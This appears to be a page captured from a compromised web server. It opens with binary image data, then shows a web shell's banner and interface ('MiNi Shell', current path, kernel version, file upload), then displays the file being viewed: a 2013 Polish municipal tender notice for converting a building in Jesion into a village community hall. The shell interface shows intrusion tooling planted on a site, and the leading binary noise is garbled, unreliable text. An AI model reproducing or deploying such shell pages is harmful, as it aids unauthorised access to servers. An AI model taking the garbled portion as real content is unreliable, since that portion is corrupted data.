JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130318/106914-N-2013.html

<p class="kh_header"><b>Kolsko: Adaptacja budynku pod potrzeby świetlicy wiejskiej w Jesionie wraz z wyposażeniem</b><br>
<b>Numer ogłoszenia: 106914 - 2013; data zamieszczenia: 18.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kolsko , ul. Piastowska 12, 67-415 Kolsko, woj. lubuskie, tel. 068 3524177, faks 068 3524355.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku pod potrzeby świetlicy wiejskiej w Jesionie wraz z wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest adaptacja budynku pod potrzeby świetlicy wiejskiej w Jesionie wraz z wyposażeniem. Przedmiot zamówienia obejmuje:
A. Roboty rozbiórkowe, w tym m. in.:
1. Rozbiórka budynku gospodarczego znajdującego się na działce nr 155/3 poprzez: rozbiórkę więźby dachowej, rozbiórkę ścian konstrukcyjnych oraz rozbiórkę ław fundamentowych. 
2. Mechaniczna rozbiórka elementów konstrukcji betonowych niezbrojonych o grubości ponad 15 cm.
3. Mechaniczna rozbiórka elementów konstrukcji betonowych niezbrojonych o grubości do 15 cm.
4. Ręczna rozbiórka elementów konstrukcji betonowych zbrojonych.
5. Rozebranie kominów wolnostojących.
6. Wykucie z muru kratek wentylacyjnych.
7. Wykucie z muru ościeżnic drewnianych i stalowych.
8. Wykucie z muru krat okiennych.
9. Rozebranie rynien z blachy nie nadającej się do użytku.
10. Rozbiórka pokrycia z papy na dachach betonowych.
11. Demontaż kotła c o.
12. Demontaż urządzenia hydroforowego ze zbiornikiem.
B. Roboty budowlane - w wewnątrz budynku, w tym m. in.:
1. Na istniejące tynki wewnętrzne wykonać gładź szpachlową gipsową gr. ok 20 mm. W celu zwiększenia przyczepności gładzi do starego tynku należy zastosować środki gruntujące unigrunt oraz betonkontakt. Po wyschnięciu tynków należy je wyszlifować i pomalować farbami akrylowymi.
2. W całym lokalu należy wykonać wylewkę betonową wyrównawczą, aby uzyskać jednakowy poziom posadzki w całym lokalu. Jako warstwę wierzchnią wykonać płytki ceramiczne antypoślizgowe. Pod wylewkę wykonać izolację przeciwwilgociową w postaci folii budowlanej.
3. Ściany wewnętrzne malowane farbami akrylowymi. W pomieszczeniach sanitarnych położyć płytki ceramiczne na wysokość min 2 m. W kuchni  zastosować fartuch z płytek ceramicznych. Dodatkowo w kuchni wykonać cokół przyposadzkowy wysokości 10 cm z płytek ceramicznych. 
4. Wymiana wszystkich okien na nowe (materiał PCV).
5. Wymiana drzwi wewnętrznych oraz drzwi wejściowych głównych i ogrodowych na nowe.
C. Roboty budowlane zewnętrzne, w tym m. in.:
1. Docieplenie ścian budynków płytami styropianowymi grubość 12 cm - metoda lekka, faktura gładka nakładana ręcznie, grubość 2 mm na ścianach.
2. Docieplenie ścian budynków płytami styropianowymi grubość 3 cm - metoda lekka, faktura gładka nakładana ręcznie, grubość 2 mm na ościeżach.
3. Docieplenie ścian budynków (cokół) na wysokości 60 cm od poziomu terenu (strona frontowa - od poziomu tarasu) płytami styropianowymi grubość 10 cm - metoda lekka, tynk mozaikowy, nakładana ręcznie, grubość 2 mm na ścianach.
4. Stropodach włącznie z ogniomurkami ocieplić styropianem EPS100 grubość 12 cm.
5. Pokrycie dachu dwiema warstwami papy: pierwsza termozgrzewalna podkładowa, druga termozgrzewalna wierzchniego krycia.
6. Montaż rur spustowych i rynien dachowych półokrągłych o śr. 15 cm - materiał: blacha cynk-tytan.
7. Wymiana istniejących parapetów zewnętrznych na nowe - materiał: blacha stalowa ocynkowana o grubości 0,75 mm, malowane farbami poliestrowymi.
8. Montaż zadaszenia nad drzwiami wejściowymi: daszek z poliwęglanu łukowy, konstrukcja z aluminium.
9. Remont istniejących schodów wejściowych głównych do budynku oraz tarasu istniejącego betonowego poprzez wykonanie wylewki betonowej wraz z uzyskaniem spadku min. 1,5% w stronę schodów, następnie wykonanie izolacji z folii polietylenowej poziomej podposadzkowej.
10. Ułożenie na schodach wejściowych głównych do budynku oraz tarasie posadzki z płytek antypoślizgowych.  
11. Balustrady schodowe z rur malowanych proszkowo.
D. Wykonanie instalacji wodno - kanalizacyjnej:
Budynek jest zasilany z istniejącego przyłącza wodociągowego fi32, podłączony jest do bezodpływowego zbiornika na nieczystości ciekłe.
1. Instalacja wodna: Wymiana istniejącej instalacji wodnej z rur PE-Xc łączonych za pomocą złączek zaciskowych z zastosowanie kształtek mosiężnych. W miejscach połączeń baterii i zaworów czerpalnych przewiduje się zastosowanie złączek metalowych, gwintowanych. Do uszczelnienia łączników gwintowanych należy stosować taśmę lub pastę teflonową. Rury wodociągowe układane w posadzce należy montować w karbowanych rurach osłonowych typu PESZEL. Przed zabetonowaniem rur należy przeprowadzić próbę szczelności na ciśnienie 1,5 razy większe od ciśnienia roboczego. W miejscach przejść przez ściany i stropy zastosować otuliny ze specjalnego PE. Wszystkie przewody rozprowadzające, prowadzone w ściankach działowych i bruzdach, należy zaizolować kształtkami z pianki poliuretanowej. Projektuje się 3 szt. elektrycznych podgrzewaczy wody: 1 szt. podgrzewacz ze zbiornikiem o pojemności 60 dm3 oraz 2 szt. podgrzewacze ze zbiornikiem o pojemności 5 dm3 - nadumywalkowe.
2. Instalacja kanalizacyjna: Odprowadzanie ścieków sanitarnych istniejące, z budynku do bezodpływowego zbiornika na nieczystości ciekłe. Należy wymienić istniejącą instalację kanalizacyjną wewnątrz budynku. Przewody poziome, łączące piony kanalizacyjne z głównym kanałem odpływowym, ułożone są pod posadzką pomieszczeń na głębokości zabezpieczającej je przed przemarzaniem i uszkodzeniami mechanicznymi. Piony i podejścia do przewodów sanitarnych należy wykonać z rur i kształtek PCV kielichowych lub polipropylenowych PP. Piony kanalizacyjne należy wyprowadzić ponad dach i zakończyć rurami wywiewnymi.    
E. Wentylacja i ogrzewanie:
1. Wentylatory kanałowe: 
- w łazience: wentylacja mechaniczna wywiewna wydajność 35 m3/h podłączona pod włącznik światła;
- w Sali głównej: wentylator nawiewno-wywiewny WO-40/W 380 m3/h.
2. Ogrzewanie: 
Do ogrzewania budynku będą służyły klimatyzatory z funkcją grzania - 2 szt. 
UWAGA: W opisie technicznym do projektu budowlanego instalacji wodno-kanalizacyjnej oraz centralnego ogrzewania omyłkowo zapisane jest, że źródłem ciepła dla instalacji c. o. będzie piec jednofunkcyjny na paliwo stałe. Rzeczywistym źródłem ogrzewania są klimatyzatory z funkcją grzania.  
F. Wyposażenie, w tym:
1. Zlewozmywak z blachy nierdzewnej, dwukomorowy szer. 80 cm - 1 szt.
2. Szafka kuchenna podłogowa dwudrzwiowa szer. 80 cm (pod zlewozmywak) - 1 szt.
3. Szafki kuchenne podłogowe dwudrzwiowe szer. 60 cm - 11 szt.
4. Szafki kuchenne podłogowe dwudrzwiowe szer. 80 cm - 2 szt 
5. Zakup i dostarczenie lodówki (kolor biały, zamrażalnik dolny, klasa energetyczna A++, poziom hałasu 41 dB, pojemność 270-300 l).
6. Zakup i dostarczenie piekarnika z płytą ceramiczną.
7. Blat kuchenny (laminowany w kolorze białym, matowy; wymiary: grubość 40 mm szerokość 60 cm - 9,50 m. Wszystkie krawędzie zabezpieczone obrzeżem PCV. 
8. Zakup i dostarczenie stołów na salę - 8 szt. Stoły 6 - osobowe o wymiarach 90x200 cm, wysokość 78 cm. 
9. Zakup i dostarczenie krzeseł na salę (drewniane, tapicerowane) - 50 szt.
10. Zakup i dostarczenie regału stalowego 200x60x200 cm (wys. x głęb. x dł.) - 1 szt.
11. Zakup i dostarczenie szafki ubraniowej z wieszakami
G. Zagospodarowanie terenu:
1. Ułożenie posadzki z kostki betonowej o wymiarach 14,4 m (długość) x 5 m (szerokość liczona od końca schodów do granicy działki) o grubości 80 mm, na podsypce piaskowej grubość 50 mm z wypełnieniem spoin piaskiem.
2. Krawężniki betonowe wystające o wymiarach 15 x 30 cm z wykonaniem ław betonowych na podsypce cementowo-piaskowej.
3. Ogrodzenie systemowe ocynkowane wysokość 1,5 m, na słupkach stalowych o rozst. 2,5 m obsadzonych w gruncie i obetonowanych. Długość ogrodzenia 150 m.
4. Brama wjazdowa wysokość 1,5 m, szerokość 3 m.
5. Furtki o wymiarach wysokość x 1,5 m, szerokość 1 m  - 2 szt.
H. Instalacje elektryczne: Należy wykorzystać istniejące przyłącze energetyczne. 
1. Dla zasilania remontowanej świetlicy wiejskiej należy zdemontować stary WLZ i wykonać nową wewnętrzną linię zasilającą YDY 5x10 mm2. 
2. Istniejącą tablicę licznikową oraz urządzenia istniejącej rozdzielni bezpiecznikowej należy zdemontować. W miejsce zdemontowanych urządzeń należy zabudować nową rozdzielnię licznikowo-bezpiecznikową RG. Z rozdzielni tej zasilane będą wszystkie obwody remontowanych pomieszczeń.
3. W budynku świetlicy znajdują się dwa obwody instalacji 3 - fazowej 400 V, służące do zasilania kuchenki elektrycznej oraz kurtyny powietrznej i ewentualnych urządzeń 3 - fazowych. Obwody należy ułożyć pod tynkiem przewodem YDY 5 x 4 i zakończyć nowymi gniazdami 5 x 25 A. 
4. Istniejącą instalację gniazd wtykowych należy w całości zdemontować. Nową instalację gniazd wtykowych 230 V należy prowadzić w tynku a pod płytkami z glazury oraz na elementach drewnianych i konstrukcjach metalowych sufitów podwieszanych w rurach ochronnych PCV, przewodem YDY 3 x 2,5 mm2. Zaprojektowano oddzielne obwody instalacji gniazd wtykowych dla kuchni, łazienki, szatni oraz dwa niezależne na salę główną. Gniazda wtykowe ze stykiem ochronnym montować w szatni i na Sali na wysokości 30 cm od podłogi, natomiast w kuchni wysokość gniazd powinna wynosić 115 cm. W łazience zastosowano osprzęt hermetyczny Ip-44 a wysokość gniazd wynosi 135 cm, natomiast oprawa powinna posiadać  II klasę ochrony.
5. Istniejącą instalację oświetleniową należy w całości zdemontować. Nową instalację oświetleniową należy prowadzić w tynku a pod płytkami z glazury oraz na elementach drewnianych i konstrukcjach metalowych sufitów podwieszanych w rurach ochronnych PCV przewodem YDYp 3 x 1,5 mm2. W pomieszczeniach gdzie zastosowano wyłącznik świecznikowy od puszki do opraw należy ułożyć przewód YDYp 4 x 1,5 mm2. Oświetlenie zaprojektowano głównie jako jarzeniowe, które wspomagane będzie oprawami żarowymi. Oprawy oświetleniowe w łazienkach powinny posiadać II klasę ochronności. Do wyłączników w WC należy przyłączyć wentylatory kanałowe w taki sposób, aby przy zapalaniu oświetlenia załączany został wentylator. 
Przedmiot zamówienia nie obejmuje budowy placu zabaw, gdyż inwestycja ta będzie przedmiotem odrębnego postępowania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.21.00.00-2, 45.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 3.000,00zł (słownie: trzy tysiące złotych 00/100). Wadium może być wniesione w następującej formie: a) pieniądzu, b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania niezbędnej wiedzy i doświadczenia Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, iż zrealizował w okresie ostatnich 5 lat dwie roboty budowlane, polegającą na wykonaniu podobnego zamówienia o wartości minimum 100.000,00 zł każda. W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy muszą spełniać łącznie. Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć dokument pn. Wykaz robót budowlanych opisany w rozdziale III SIWZ, w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. Do wykazu należy załączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.  Sposób dokonania oceny: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego punktu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca wykaże, że dysponuje wykwalifikowaną kadrą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi - minimum 1 osoba. W przypadku składania oferty wspólnej niniejszy warunek Wykonawcy muszą spełniać łącznie. Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć dokument pn. Wykaz osób - dokument opisany w rozdziale III SIWZ, w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. Sposób dokonania oceny: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego odpowiedniej sytuacji ekonomiczno - finansowej Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. W przypadku składania oferty wspólnej niniejszy warunek każdy z Wykonawców winien spełnić osobno. Dla potwierdzenia spełnienia wyżej opisanego warunku Wykonawca winien złożyć opłaconą polisę wg warunków opisanych w rozdziale III SIWZ, w punkcie Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu. Sposób dokonania oceny: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w opisanych poniżej sytuacjach: a) Termin realizacji zamówienia może ulec zmianie w sytuacji: - udzielenia w trakcie realizacji umowy zamówień dodatkowych lub zamiennych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia), - wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie wykonania umowy, potwierdzonych pisemnie przez Zamawiającego, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie, (nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w okresie realizacji robót, które wykonawca winien wziąć pod uwagę przy składaniu oferty -cykl pór roku), - wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, - pisemnego żądania wstrzymania robót skierowanego do Wykonawcy przez Zamawiającego, inspektora nadzoru inwestorskiego lub wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność,  - wprowadzenia zmian w dokumentacji projektowej o czas niezbędny dla dostosowania Wykonawcy do takiej zmiany,
-wystąpienia braków i wad w dokumentacji projektowej lub innych dokumentów budowy, - wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych; b) Zmiana sposobu spełnienia świadczenia, na skutek zmian technologicznych, spowodowanych w szczególności następującymi okolicznościami: -niedostępność na rynku materiałów i urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń; - pojawienie się na rynku materiałów lub urządzeń nowszej generacji, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości robót; - pojawienie się nowszej technologii wykonania zaprojektowania robót, pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy; - konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/ technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy. c) Inne możliwe zmiany w postanowieniach umowy: -zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron, w tym zmiany kierownika budowy lub 